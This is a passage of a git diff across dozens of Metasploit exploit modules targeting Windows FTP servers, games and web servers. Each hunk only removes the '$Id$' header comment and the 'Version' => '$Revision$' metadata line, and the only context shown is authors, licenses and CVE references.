b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Kingcope ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['EDB', '9541'], diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 1e5ca9ade9..e6bfa84d5d 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1323'], diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 2d31be5e79..d9e04da195 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', #wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68824' ], diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index fbbdaf3643..43fcbf0041 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0727'], diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 3bcfe0fac9..863a0a5839 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'David Litchfield ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'References' => [ diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 09a7a05a66..68791b8c29 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'His0k4 ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3976' ], diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 8ed65c5592..7e75fdaf0d 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Stance' => Msf::Exploit::Stance::Passive, 'References' => [ diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 90c2e0ac99..7ad15463e1 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ '', '', 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '6197'], diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 92075a4c6f..b4ab754d4b 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote to gain the same rights as the user running ScriptFTP. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'modpr0be', #Vulnerability discovery and original exploit diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index 25097ff6c6..4865b02b95 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' # found bug, wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 1ee7dded23..8e62006150 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'theLightCosine', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2111'], diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index e64e19685e..3f2ae6ecf3 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0330'], diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index 9340775398..6d72f99cea 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Fairuzan Roslan ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2373'], diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index 68077164fd..62dd407f7b 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # MSF module author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1465'], diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 7c8be46cff..8746a5dbf6 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -52,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62163' ], diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 977dc18e5a..cb20c73e7a 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'hdm', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-0256'], diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index e58eda82f8..7f71cf6a31 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'Fairuzan Roslan ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-0256'], diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index da55d8cb08..5095327188 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4318' ], diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index f9a70d3807..d91e271193 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'et', 'Reed Arvin ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'References' => [ diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index 039203c8ed..5bf5e94df4 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4847' ], diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index d4f3f6c6ee..f8d28343c8 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # MSF module author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '63968'], diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 37dd3807f0..9cd158ecc9 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5792' ], diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index ecdc2afd2d..3383225c63 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5792' ], diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index a832eebf63..9c26d26adc 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0735'], diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 0fbf35406f..44f92dfc71 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Trancek ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4370' ], diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index a06e2646e7..409d4c1054 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0608'], diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 4f479ce004..579e195313 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index e2eb512213..8b8af0cad6 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4193' ], diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index a04d82f62e..56ef23286f 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0471' ], diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 2d69004b7f..9be7c32fe0 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66814' ], diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 9d5a6ad887..efe5f2bd30 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote the server will crash. }, 'Author' => [ 'hdm', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-0392' ], diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 8b553300aa..540ca2400b 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote only supports Windows based installations. }, 'Author' => 'patrick', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3747' ], diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 3bdf0433aa..e315e6115d 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote Should work on any Win32 OS. }, 'Author' => 'Nicob ', - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 8f8e3a5d8f..b2fbfbb9aa 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'acaro ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0595' ], diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index b46c81e342..5ecf4450c1 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-6377'], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 331b8e0cf7..ffce9c30eb 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote long JSESSION cookie value can lead to arbirtary code execution. }, 'Author' => 'pusscat', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5457' ], diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 5c9eafb89f..fdf49d1a5a 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'KingCope', # Vulnerability Discovery and PoC 'juan vazquez', # Metasploit Module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3257' ], diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 890862a21a..0f41db50d6 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote You may have to run this twice due to timing issues with handlers. }, 'Author' => 'pusscat', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4008' ], diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index 1ebcde2f59..10213883a9 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54395' ], diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 1410cffc57..cd8ff1bd4b 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rgod', # original public exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3011' ], diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 7bac383c1c..8e87a97452 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3190' ], diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index 2f417cfedd..b907a58eb6 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-134' ], diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index 26e1f20948..d57ed0f221 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 5121c21175..3484cdf86f 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'ThE g0bL!N', # Original exploit [see References] 'jduck' # Metasploit re-implementation ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66614'], diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index bdad26a427..6f14a12279 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5478'], diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index fd05bd7e25..7d60d90283 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown', 'Matt Olney ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2551'], diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 4553db5729..493d380937 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'LSO ' ], 